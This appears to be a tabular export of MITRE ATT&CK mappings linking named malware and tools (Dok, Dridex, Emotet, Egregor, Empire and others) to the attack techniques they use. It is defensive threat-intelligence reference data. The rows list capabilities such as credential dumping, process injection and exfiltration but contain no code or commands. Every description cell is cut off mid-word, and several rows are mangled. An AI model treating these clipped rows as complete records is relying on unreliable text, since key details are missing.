S0281 Dok malware-- software uses T1543.001Launch Ageattack-pat technique [Dok](https
S0281 Dok malware-- software uses T1222.002Linux and M attack-pat technique [Dok](http
S0281 Dok malware-- software uses T1547.015Login Itemattack-pat technique [Dok](https
S0281 Dok malware-- software uses T1090.003Multi-hop attack-pat technique [Dok](http
S0281 Dok malware-- software uses T1027.002Software Pattack-pat technique [Dok](https
S0281 Dok malware-- software uses T1548.003Sudo and Sattack-pat technique [Dok](http
S0600 Doki malware--4software uses T1573.002Asymmetricattack-pat technique [Doki](http
S0600 Doki malware--4software uses T1020 Automatedattack-pat technique [Doki](http
S0600 Doki malware--4software uses T1610 Deploy Conattack-pat technique [Doki](http
S0600 Doki malware--4software uses T1568.002Domain Gen attack-pat technique [Doki](http
S0600 Doki malware--4software uses T1611 Escape to attack-pat technique [Doki](http
S0600 Doki malware--4software uses T1041 Exfiltratio attack-pat technique [Doki](http
S0600 Doki malware--4software uses T1133 External R attack-pat technique [Doki](http
S0600 Doki malware--4software uses T1083 File and Di attack-pat technique [Doki](http
S0600 Doki malware--4software uses T1105 Ingress Tooattack-pat technique [Doki](http
S0600 Doki malware--4software uses T1036.005Match Legiattack-pat technique [Doki](http
S0600 Doki malware--4software uses T1057 Process Di attack-pat technique [Doki](http
S0600 Doki malware--4software uses T1059.004Unix Shell attack-pat technique [Doki](http
S0600 Doki malware--4software uses T1071.001Web Protocattack-pat technique [Doki](http
S0600 Doki malware--4software uses T1102 Web Servicattack-pat technique [Doki](http
S0695 Donut tool--a7b5 software uses T1059 Command attack-pat
an technique [Donut](htt
S0695 Donut tool--a7b5 software uses T1562.001Disable or attack-pat technique [Donut](htt
S0695 Donut tool--a7b5 software uses T1070 Indicator attack-pat technique [Donut](htt
S0695 Donut tool--a7b5 software uses T1105 Ingress Tooattack-pat technique [Donut](ht
S0695 Donut tool--a7b5 software uses T1059.007JavaScript attack-pat technique [Donut](htt
S0695 Donut tool--a7b5 software uses T1106 Native API attack-pat technique [Donut](htt
S0695 Donut tool--a7b5 software uses T1027 Obfuscatedattack-pat technique [Donut](ht
S0695 Donut tool--a7b5 software uses T1059.001PowerShellattack-pat technique [Donut](htt
S0695 Donut tool--a7b5 software uses T1057 Process Di attack-pat technique [Donut](htt
S0695 Donut tool--a7b5 software uses T1055 Process Injattack-pat technique [Donut](htt
S0695 Donut tool--a7b5 software uses T1059.006Python attack-pat technique [Donut](htt
S0695 Donut tool--a7b5 software uses T1620 Reflective attack-pat technique [Donut](htt
S0695 Donut tool--a7b5 software uses T1027.002Software Pattack-pat technique [Donut](ht
S0695 Donut tool--a7b5 software uses T1059.005Visual Basiattack-pat technique [Donut](htt
S0695 Donut tool--a7b5 software uses T1071.001Web Protocattack-pat technique [Donut](ht
S0186 DownPapemalware-- software uses T1059.001PowerShellattack-pat technique [DownPaper
S0186 DownPapemalware-- software uses T1012 Query Regiattack-pat technique [DownPaper
S0186 DownPapemalware-- software uses T1547.001Registry Ruattack-pat technique [DownPaper]
S0186 DownPapemalware-- software uses T1082 System Inf attack-pat technique [DownPaper]
S0186 DownPapemalware-- software uses T1033 System Own attack-pat technique [DownPaper]
S0186 DownPapemalware-- software uses T1071.001Web Protocattack-pat technique [DownPaper
S0186 DownPapemalware-- software uses T1059.003Windows Cattack-pat technique [DownPaper
S0134 Downdelphmalware-- software uses T1548.002Bypass Useattack-pat technique [Downdelph]
S0134 Downdelphmalware-- software uses T1574.001DLL Searchattack-pat technique [Downdelph]
S0134 Downdelphmalware-- software uses T1105 Ingress Tooattack-pat technique After downl
S0134 Downdelphmalware-- software uses T1001.001Junk Data attack-pat technique [Downdelph]
S0134 Downdelphmalware-- software uses T1573.001Symmetric attack-pat technique [Downdelph]
S0384 Dridex malware-- software uses T1573.002Asymmetricattack-pat technique [Dridex](ht
S0384 Dridex malware-- software uses T1185 Browser Seattack-pat technique [Dridex](ht
S0384 Dridex malware-- software uses T1574.002DLL Side-L attack-pat technique [Dridex](ht
S0384 Dridex malware-- software uses T1204.002Malicious Fattack-pat technique [Dridex](ht
S0384 Dridex malware-- software uses T1090.003Multi-hop attack-pat technique [Dridex](ht
S0384 Dridex malware-- software uses T1106 Native API attack-pat technique [Dridex](ht
S0384 Dridex malware-- software uses T1027 Obfuscatedattack-pat technique [Dridex](ht
S0384 Dridex malware-- software uses T1090 Proxy attack-pat technique [Dridex](ht
S0384 Dridex malware-- software uses T1218.010Regsvr32 attack-pat technique [Dridex](ht
S0384 Dridex malware-- software uses T1219 Remote Accattack-pat technique [Dridex](ht
S0384 Dridex malware-- software uses T1053.005Scheduled attack-pat technique [Dridex](h
S0384 Dridex malware-- software uses T1518 Software Dattack-pat technique [Dridex](ht
S0384 Dridex malware-- software uses T1573.001Symmetric attack-pat technique [Dridex](ht
S0384 Dridex malware-- software uses T1082 System Inf attack-pat technique [Dridex](ht
S0384 Dridex malware-- software uses T1071.001Web Protocattack-pat technique [Dridex](h
S0547 DropBook malware-- software uses T1140 Deobfuscatattack-pat technique [DropBook]
S0547 DropBook malware-- software uses T1567 Exfiltratio attack-pat technique [DropBook](
S0547 DropBook malware-- software uses T1083 File and Di attack-pat technique [DropBook](
S0547 DropBook malware-- software uses T1105 Ingress Tooattack-pat technique [DropBook]
S0547 DropBook malware-- software uses T1059.006Python attack-pat technique [DropBook]
S0547 DropBook malware-- software uses T1082 System Inf attack-pat technique [DropBook](
S0547 DropBook malware-- software uses T1614.001System Lanattack-pat technique [DropBook](
S0547 DropBook malware-- software uses T1102 Web Servicattack-pat technique [DropBook](
S0547 DropBook malware-- software uses T1059.003Windows Cattack-pat technique [DropBook]
S0502 Drovorub malware-- software uses T1005 Data from attack-pat technique [Drovorub](
S0502 Drovorub malware-- software uses T1140 Deobfuscatattack-pat technique [Drovorub]
S0502 Drovorub malware-- software uses T1041 Exfiltratio attack-pat technique [Drovorub](
S0502 Drovorub malware-- software uses T1070.004File Deleti attack-pat technique [Drovorub](
S0502 Drovorub malware-- software uses T1105 Ingress Tooattack-pat technique [Drovorub]
S0502 Drovorub malware-- software uses T1090.001Internal Prattack-pat technique [Drovorub](
S0502 Drovorub malware-- software uses T1547.006Kernel Modattack-pat technique [Drovorub](
S0502 Drovorub malware-- software uses T1095 Non-Applicattack-pat technique [Drovorub]
S0502 Drovorub malware-- software uses T1027 Obfuscatedattack-pat technique [Drovorub]
S0502 Drovorub malware-- software uses T1014 Rootkit attack-pat technique [Drovorub](
S0502 Drovorub malware-- software uses T1059.004Unix Shell attack-pat technique [Drovorub]
S0502 Drovorub malware-- software uses T1071.001Web Protocattack-pat technique [Drovorub]
S0567 Dtrack malware-- software uses T1560 Archive Coattack-pat technique [Dtrack](ht
S0567 Dtrack malware-- software uses T1547 Boot or Lo attack-pat technique [Dtrack](ht
S0567 Dtrack malware-- software uses T1217 Browser Inattack-pat technique [Dtrack](ht
S0567 Dtrack malware-- software uses T1005 Data from attack-pat technique [Dtrack](ht
S0567 Dtrack malware-- software uses T1140 Deobfuscatattack-pat technique [Dtrack](ht
S0567 Dtrack malware-- software uses T1027.009Embeddedattack-pat technique [Dtrack](ht
S0567 Dtrack malware-- software uses T1070.004File Deleti attack-pat technique [Dtrack](ht
S0567 Dtrack malware-- software uses T1083 File and Di attack-pat technique [Dtrack](ht
S0567 Dtrack malware-- software uses T1574 Hijack Exe attack-pat technique One of [Dtr
S0567 Dtrack malware-- software uses T1105 Ingress Tooattack-pat technique [Dtrack](ht
S0567 Dtrack malware-- software uses T1056.001Keyloggingattack-pat technique [Dtrack](ht
S0567 Dtrack malware-- software uses T1074.001Local Data attack-pat technique [Dtrack](ht
S0567 Dtrack malware-- software uses T1036.005Match Legiattack-pat technique One of [Dtr
S0567 Dtrack malware-- software uses T1057 Process Di attack-pat technique [Dtrack](ht
S0567 Dtrack malware-- software uses T1055.012Process Hoattack-pat technique [Dtrack](ht
S0567 Dtrack malware-- software uses T1012 Query Regiattack-pat technique [Dtrack](ht
S0567 Dtrack malware-- software uses T1129 Shared Moattack-pat technique [Dtrack](h
S0567 Dtrack malware-- software uses T1082 System Inf attack-pat technique [Dtrack](ht
S0567 Dtrack malware-- software uses T1016 System Netattack-pat technique [Dtrack](ht
S0567 Dtrack malware-- software uses T1049 System Netattack-pat technique [Dtrack](ht
S0567 Dtrack malware-- software uses T1078 Valid Acco attack-pat technique [Dtrack](ht
S0567 Dtrack malware-- software uses T1059.003Windows Cattack-pat technique [Dtrack](ht
S0567 Dtrack malware-- software uses T1543.003Windows Se attack-pat technique [Dtrack](ht
S0038 Duqu malware-- software uses T1134 Access Tokattack-pat technique [Duqu](http
S0038 Duqu malware-- software uses T1071 Applicationattack-pat technique [Duqu](htt
S0038 Duqu malware-- software uses T1010 Applicatio attack-pat technique The discov
S0038 Duqu malware-- software uses T1560.003Archive vi attack-pat technique Modules ca
S0038 Duqu malware-- software uses T1055.001Dynamic-linattack-pat technique [Duqu](http
S0038 Duqu malware-- software uses T1090.001Internal Prattack-pat technique [Duqu](htt
S0038 Duqu malware-- software uses T1056.001Keyloggingattack-pat technique [Duqu](htt
S0038 Duqu malware-- software uses T1087.001Local Acco attack-pat technique The discov
S0038 Duqu malware-- software uses T1074.001Local Data attack-pat technique Modules ca
S0038 Duqu malware-- software uses T1218.007Msiexec attack-pat technique [Duqu](htt
S0038 Duqu malware-- software uses T1057 Process Di attack-pat technique The discov
S0038 Duqu malware-- software uses T1055.012Process Hoattack-pat technique [Duqu](http
S0038 Duqu malware-- software uses T1572 Protocol T attack-pat technique [Duqu](htt
S0038 Duqu malware-- software uses T1021.002SMB/Windo attack-pat technique Adversaries
S0038 Duqu malware-- software uses T1053.005Scheduled attack-pat technique Adversaries
S0038 Duqu malware-- software uses T1001.002Steganogr attack-pat technique When the [
S0038 Duqu malware-- software uses T1573.001Symmetric attack-pat technique The [Duqu]
S0038 Duqu malware-- software uses T1016 System Netattack-pat technique The reconn
S0038 Duqu malware-- software uses T1049 System Netattack-pat technique The discov
S0038 Duqu malware-- software uses T1078 Valid Acco attack-pat technique Adversaries
S0038 Duqu malware-- software uses T1543.003Windows Se attack-pat technique [Duqu](http
S0062 DustySky malware-- software uses T1560.001Archive viaattack-pat technique [DustySky](
S0062 DustySky malware-- software uses T1041 Exfiltratio attack-pat technique [DustySky](
S0062 DustySky malware-- software uses T1008 Fallback C attack-pat technique [DustySky](
S0062 DustySky malware-- software uses T1070.004File Deleti attack-pat technique [DustySky](
S0062 DustySky malware-- software uses T1083 File and Di attack-pat technique [DustySky](
S0062 DustySky malware-- software uses T1056.001Keyloggingattack-pat technique [DustySky](
S0062 DustySky malware-- software uses T1570 Lateral Tooattack-pat technique [DustySky](
S0062 DustySky malware-- software uses T1074.001Local Data attack-pat technique [DustySky](
S0062 DustySky malware-- software uses T1027 Obfuscatedattack-pat technique The [DustyS
S0062 DustySky malware-- software uses T1120 Peripheral attack-pat technique [DustySky]
S0062 DustySky malware-- software uses T1057 Process Di attack-pat technique [DustySky](
S0062 DustySky malware-- software uses T1547.001Registry Ruattack-pat technique [DustySky]
S0062 DustySky malware-- software uses T1091 Replicatio attack-pat technique [DustySky](
S0062 DustySky malware-- software uses T1113 Screen Capattack-pat technique [DustySky]
S0062 DustySky malware-- software uses T1518.001Security S attack-pat technique [DustySky](
S0062 DustySky malware-- software uses T1518 Software Dattack-pat technique [DustySky](
S0062 DustySky malware-- software uses T1082 System Inf attack-pat technique [DustySky](
S0062 DustySky malware-- software uses T1071.001Web Protocattack-pat technique [DustySky](
S0062 DustySky malware-- software uses T1047 Windows M attack-pat technique The [Dusty
S0024 Dyre malware--6software uses T1140 Deobfuscatattack-pat technique [Dyre](htt
S0024 Dyre malware--6software uses T1055.001Dynamic-linattack-pat technique [Dyre](http
S0024 Dyre malware--6software uses T1041 Exfiltratio attack-pat technique [Dyre](htt
S0024 Dyre malware--6software uses T1105 Ingress Tooattack-pat technique [Dyre](htt
S0024 Dyre malware--6software uses T1074.001Local Data attack-pat technique [Dyre](http
S0024 Dyre malware--6software uses T1055 Process Injattack-pat technique [Dyre](http
S0024 Dyre malware--6software uses T1053.005Scheduled attack-pat technique [Dyre](http
S0024 Dyre malware--6software uses T1518 Software Dattack-pat technique [Dyre](http
S0024 Dyre malware--6software uses T1027.002Software Pattack-pat technique [Dyre](htt
S0024 Dyre malware--6software uses T1497.001System Cheattack-pat technique [Dyre](http
S0024 Dyre malware--6software uses T1082 System Inf attack-pat technique [Dyre](htt
S0024 Dyre malware--6software uses T1016 System Netattack-pat technique [Dyre](http
S0024 Dyre malware--6software uses T1033 System Own attack-pat technique [Dyre](http
S0024 Dyre malware--6software uses T1007 System Serattack-pat technique [Dyre](http
S0024 Dyre malware--6software uses T1071.001Web Protocattack-pat technique [Dyre](htt
S0024 Dyre malware--6software uses T1543.003Windows Se attack-pat technique [Dyre](http
S0593 ECCENTRI malware-- software uses T1070.004File Deleti attack-pat technique [ECCENTRIC
S0593 ECCENTRI malware-- software uses T1056.001Keyloggingattack-pat technique [ECCENTRIC
S0593 ECCENTRI malware-- software uses T1074.001Local Data attack-pat technique [ECCENTRIC
S0593 ECCENTRI malware-- software uses T1027 Obfuscatedattack-pat technique [ECCENTRIC
S0593 ECCENTRI malware-- software uses T1113 Screen Capattack-pat technique [ECCENTRIC
S0593 ECCENTRI malware-- software uses T1059.003Windows Cattack-pat technique [ECCENTRIC
S0605 EKANS malware-- software uses T1486 Data Encryattack-pat technique [EKANS](htt
S0605 EKANS malware-- software uses T1562.001Disable or attack-pat technique [EKANS](ht
S0605 EKANS malware-- software uses T1490 Inhibit Sy attack-pat technique [EKANS](htt
S0605 EKANS malware-- software uses T1036.005Match Legiattack-pat technique [EKANS](ht
S0605 EKANS malware-- software uses T1027 Obfuscatedattack-pat technique [EKANS](htt
S0605 EKANS malware-- software uses T1057 Process Di attack-pat technique [EKANS](ht
S0605 EKANS malware-- software uses T1489 Service Stoattack-pat technique [EKANS](htt
S0605 EKANS malware-- software uses T1016 System Netattack-pat technique [EKANS](ht
S0605 EKANS malware-- software uses T1047 Windows M attack-pat technique [EKANS](ht
S0064 ELMER malware-- software uses T1083 File and Di attack-pat technique [ELMER](htt
S0064 ELMER malware-- software uses T1057 Process Di attack-pat technique [ELMER](htt
S0064 ELMER malware-- software uses T1071.001Web Protocattack-pat technique [ELMER](ht
S0568 EVILNUM malware--7software uses T1041 Exfiltratio attack-pat technique [EVILNUM](h
S0568 EVILNUM malware--7software uses T1070 Indicator attack-pat technique [EVILNUM](h
S0568 EVILNUM malware--7software uses T1105 Ingress Tooattack-pat technique [EVILNUM](h
S0568 EVILNUM malware--7software uses T1112 Modify Regattack-pat technique [EVILNUM](h
S0568 EVILNUM malware--7software uses T1102.003One-Way Cattack-pat technique [EVILNUM](
S0568 EVILNUM malware--7software uses T1547.001Registry Ruattack-pat technique [EVILNUM](h
S0568 EVILNUM malware--7software uses T1218.010Regsvr32 attack-pat technique [EVILNUM](h
S0568 EVILNUM malware--7software uses T1218.011Rundll32 attack-pat technique [EVILNUM](
S0568 EVILNUM malware--7software uses T1518.001Security S attack-pat technique [EVILNUM](h
S0568 EVILNUM malware--7software uses T1539 Steal Web attack-pat technique [EVILNUM](
S0568 EVILNUM malware--7software uses T1082 System Inf attack-pat technique [EVILNUM](
S0568 EVILNUM malware--7software uses T1033 System Own attack-pat technique [EVILNUM](
S0568 EVILNUM malware--7software uses T1070.006Timestompattack-pat technique [EVILNUM](h
S0568 EVILNUM malware--7software uses T1047 Windows M attack-pat technique [EVILNUM](
S0377 Ebury malware--dsoftware uses T1020 Automatedattack-pat technique If credenti
S0377 Ebury malware--dsoftware uses T1553.002Code Signi attack-pat technique [Ebury](htt
S0377 Ebury malware--dsoftware uses T1554 Compromise attack-pat technique [Ebury](htt
S0377 Ebury malware--dsoftware uses T1071.004DNS attack-pat technique [Ebury](htt
S0377 Ebury malware--dsoftware uses T1140 Deobfuscatattack-pat technique [Ebury](ht
S0377 Ebury malware--dsoftware uses T1562.012Disable or attack-pat technique [Ebury](htt
S0377 Ebury malware--dsoftware uses T1562.001Disable or attack-pat technique [Ebury](ht
S0377 Ebury malware--dsoftware uses T1568.002Domain Gen attack-pat technique [Ebury](htt
S0377 Ebury malware--dsoftware uses T1574.006Dynamic Liattack-pat technique When [Ebury
S0377 Ebury malware--dsoftware uses T1041 Exfiltratio attack-pat technique [Ebury](htt
S0377 Ebury malware--dsoftware uses T1008 Fallback C attack-pat technique [Ebury](htt
S0377 Ebury malware--dsoftware uses T1562.006Indicator Battack-pat technique [Ebury](htt
S0377 Ebury malware--dsoftware uses T1556 Modify Autattack-pat technique [Ebury](htt
S0377 Ebury malware--dsoftware uses T1027 Obfuscatedattack-pat technique [Ebury](htt
S0377 Ebury malware--dsoftware uses T1556.003Pluggable attack-pat technique [Ebury](htt
S0377 Ebury malware--dsoftware uses T1552.004Private Keyattack-pat technique [Ebury](htt
S0377 Ebury malware--dsoftware uses T1059.006Python attack-pat technique [Ebury](htt
S0377 Ebury malware--dsoftware uses T1014 Rootkit attack-pat technique [Ebury](htt
S0377 Ebury malware--dsoftware uses T1129 Shared Moattack-pat technique [Ebury](htt
S0377 Ebury malware--dsoftware uses T1132.001Standard Eattack-pat technique [Ebury](htt
S0377 Ebury malware--dsoftware uses T1573.001Symmetric attack-pat technique [Ebury](htt
S0377 Ebury malware--dsoftware uses T1059.004Unix Shell attack-pat technique [Ebury](htt
S0624 Ecipekac malware-- software uses T1553.002Code Signi attack-pat technique [Ecipekac](
S0624 Ecipekac malware-- software uses T1574.002DLL Side-L attack-pat technique [Ecipekac](
S0624 Ecipekac malware-- software uses T1140 Deobfuscatattack-pat technique [Ecipekac](
S0624 Ecipekac malware-- software uses T1105 Ingress Tooattack-pat technique [Ecipekac]
S0624 Ecipekac malware-- software uses T1027 Obfuscatedattack-pat technique [Ecipekac](
S0554 Egregor malware-- software uses T1197 BITS Jobs attack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1574.002DLL Side-L attack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1486 Data Encryattack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1039 Data from attack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1140 Deobfuscatattack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1562.001Disable or attack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1069.002Domain Grattack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1484.001Group Poliattack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1105 Ingress Tooattack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1036.004Masquerade attack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1106 Native API attack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1059.001PowerShellattack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1055 Process Injattack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1218.010Regsvr32 attack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1219 Remote Accattack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1218.011Rundll32 attack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1027.002Software Pattack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1082 System Inf attack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1049 System Netattack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1033 System Own attack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1124 System Timattack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1497.003Time Basedattack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1497 Virtualiza attack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1071.001Web Protocattack-pat technique [Egregor](h
S0554 Egregor malware-- software uses T1059.003Windows Cattack-pat technique [Egregor](h
S0081 Elise malware-- software uses T1055.001Dynamic-linattack-pat technique [Elise](htt
S0081 Elise malware-- software uses T1027.013Encrypted/attack-pat technique [Elise](htt
S0081 Elise malware-- software uses T1070.004File Deleti attack-pat technique [Elise](htt
S0081 Elise malware-- software uses T1083 File and Di attack-pat technique A variant o
S0081 Elise malware-- software uses T1105 Ingress Tooattack-pat technique [Elise](htt
S0081 Elise malware-- software uses T1087.001Local Acco attack-pat technique [Elise](htt
S0081 Elise malware-- software uses T1074.001Local Data attack-pat technique [Elise](htt
S0081 Elise malware-- software uses T1036.005Match Legiattack-pat technique If installi
S0081 Elise malware-- software uses T1057 Process Di attack-pat technique [Elise](ht
S0081 Elise malware-- software uses T1547.001Registry Ruattack-pat technique If establi
S0081 Elise malware-- software uses T1218.011Rundll32 attack-pat technique After copyi
S0081 Elise malware-- software uses T1132.001Standard Eattack-pat technique [Elise](htt
S0081 Elise malware-- software uses T1573.001Symmetric attack-pat technique [Elise](htt
S0081 Elise malware-- software uses T1082 System Inf attack-pat technique [Elise](htt
S0081 Elise malware-- software uses T1016 System Netattack-pat technique [Elise](htt
S0081 Elise malware-- software uses T1007 System Serattack-pat technique [Elise](htt
S0081 Elise malware-- software uses T1070.006Timestompattack-pat technique [Elise](htt
S0081 Elise malware-- software uses T1071.001Web Protocattack-pat technique [Elise](htt
S0081 Elise malware-- software uses T1543.003Windows Se attack-pat technique [Elise](htt
S0082 Emissary malware-- software uses T1027.001Binary Padattack-pat technique A variant o
S0082 Emissary malware-- software uses T1055.001Dynamic-linattack-pat technique [Emissary](
S0082 Emissary malware-- software uses T1027.013Encrypted/attack-pat technique Variants of
S0082 Emissary malware-- software uses T1615 Group Poliattack-pat technique [Emissary](
S0082 Emissary malware-- software uses T1105 Ingress Tooattack-pat technique [Emissary](
S0082 Emissary malware-- software uses T1069.001Local Grouattack-pat technique [Emissary]
S0082 Emissary malware-- software uses T1547.001Registry Ruattack-pat technique Variants of
S0082 Emissary malware-- software uses T1218.011Rundll32 attack-pat technique Variants of
S0082 Emissary malware-- software uses T1573.001Symmetric attack-pat technique The C2 serv
S0082 Emissary malware-- software uses T1082 System Inf attack-pat technique [Emissary](
S0082 Emissary malware-- software uses T1016 System Netattack-pat technique [Emissary](
S0082 Emissary malware-- software uses T1007 System Serattack-pat technique [Emissary](
S0082 Emissary malware-- software uses T1071.001Web Protocattack-pat technique [Emissary](
S0082 Emissary malware-- software uses T1059.003Windows Cattack-pat technique [Emissary](
S0082 Emissary malware-- software uses T1543.003Windows Se attack-pat technique [Emissary](
S0367 Emotet malware-- software uses T1027.001Binary Padattack-pat technique [Emotet](h
S0367 Emotet malware-- software uses T1027.010Command aOttack-pat technique [Emotet](h
S0367 Emotet malware-- software uses T1552.001Credentialsattack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1555.003Credential attack-pat technique [Emotet](h
S0367 Emotet malware-- software uses T1140 Deobfuscatattack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1055.001Dynamic-linattack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1087.003Email Accoattack-pat technique [Emotet](h
S0367 Emotet malware-- software uses T1114 Email Colleattack-pat technique [Emotet](h
S0367 Emotet malware-- software uses T1027.009Embeddedattack-pat technique [Emotet](h
S0367 Emotet malware-- software uses T1573 Encrypted attack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1027.013Encrypted/attack-pat technique [Emotet](h
S0367 Emotet malware-- software uses T1041 Exfiltratio attack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1210 Exploitatioattack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1003.001LSASS Memattack-pat technique [Emotet](h
S0367 Emotet malware-- software uses T1570 Lateral Tooattack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1078.003Local Acco attack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1114.001Local Emailattack-pat technique [Emotet](h
S0367 Emotet malware-- software uses T1204.002Malicious Fattack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1204.001Malicious Lattack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1036.004Masquerade attack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1106 Native API attack-pat technique [Emotet](h
S0367 Emotet malware-- software uses T1135 Network Shattack-pat technique [Emotet](h
S0367 Emotet malware-- software uses T1040 Network Snattack-pat technique [Emotet](h
S0367 Emotet malware-- software uses T1571 Non-Standaattack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1110.001Password Gattack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1059.001PowerShellattack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1057 Process Di attack-pat technique [Emotet](h
S0367 Emotet malware-- software uses T1055.012Process Hoattack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1620 Reflective attack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1547.001Registry Ruattack-pat technique [Emotet](h
S0367 Emotet malware-- software uses T1218.010Regsvr32 attack-pat technique [Emotet](h
S0367 Emotet malware-- software uses T1021.002SMB/Windo attack-pat technique [Emotet](h
S0367 Emotet malware-- software uses T1053.005Scheduled attack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1027.002Software Pattack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1566.001Spearphishattack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1566.002Spearphishattack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1132.001Standard Eattack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1573.001Symmetric attack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1033 System Own attack-pat technique [Emotet](h
S0367 Emotet malware-- software uses T1134.001Token Impeattack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1059.005Visual Basiattack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1071.001Web Protocattack-pat technique [Emotet](h
S0367 Emotet malware-- software uses T1016.002Wi-Fi Disc attack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1059.003Windows Cattack-pat technique [Emotet](ht
S0367 Emotet malware-- software uses T1047 Windows M attack-pat technique [Emotet](h
S0367 Emotet malware-- software uses T1543.003Windows Se attack-pat technique [Emotet](ht
S0363 Empire tool--3433 software uses T1134 Access Tokattack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1546.008Accessibili attack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1560 Archive Coattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1573.002Asymmetricattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1119 Automatedattack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1020 Automatedattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1102.002Bidirectio attack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1217 Browser Inattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1548.002Bypass Useattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1115 Clipboard attack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1027.010Command aOttack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1059 Command attack-pat
an technique [Empire](ht
S0363 Empire tool--3433 software uses T1134.002Create Proattack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1056.004Credential attack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1552.001Credentialsattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1555.003Credential attack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1574.001DLL Searchattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1021.003Distribute attack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1087.002Domain Acattack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1136.002Domain Acattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1482 Domain Truattack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1574.004Dylib Hijac attack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1041 Exfiltratio attack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1567.002Exfiltratio attack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1567.001Exfiltratio attack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1068 Exploitatioattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1210 Exploitatioattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1083 File and Di attack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1558.001Golden Ticattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1615 Group Poliattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1484.001Group Poliattack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1105 Ingress Tooattack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1558.003Kerberoastattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1056.001Keyloggingattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1557.001LLMNR/NBT attack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1003.001LSASS Memattack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1087.001Local Acco attack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1136.001Local Acco attack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1114.001Local Emailattack-pat technique [Empire](ht
[Empire](https://attack.mitre
S0363 Empire tool--3433 software uses T1127.001MSBuild attack-pat technique
S0363 Empire tool--3433 software uses T1106 Native API attack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1046 Network Seattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1135 Network Shattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1040 Network Snattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1550.002Pass the H attack-pat technique [Empire](ht
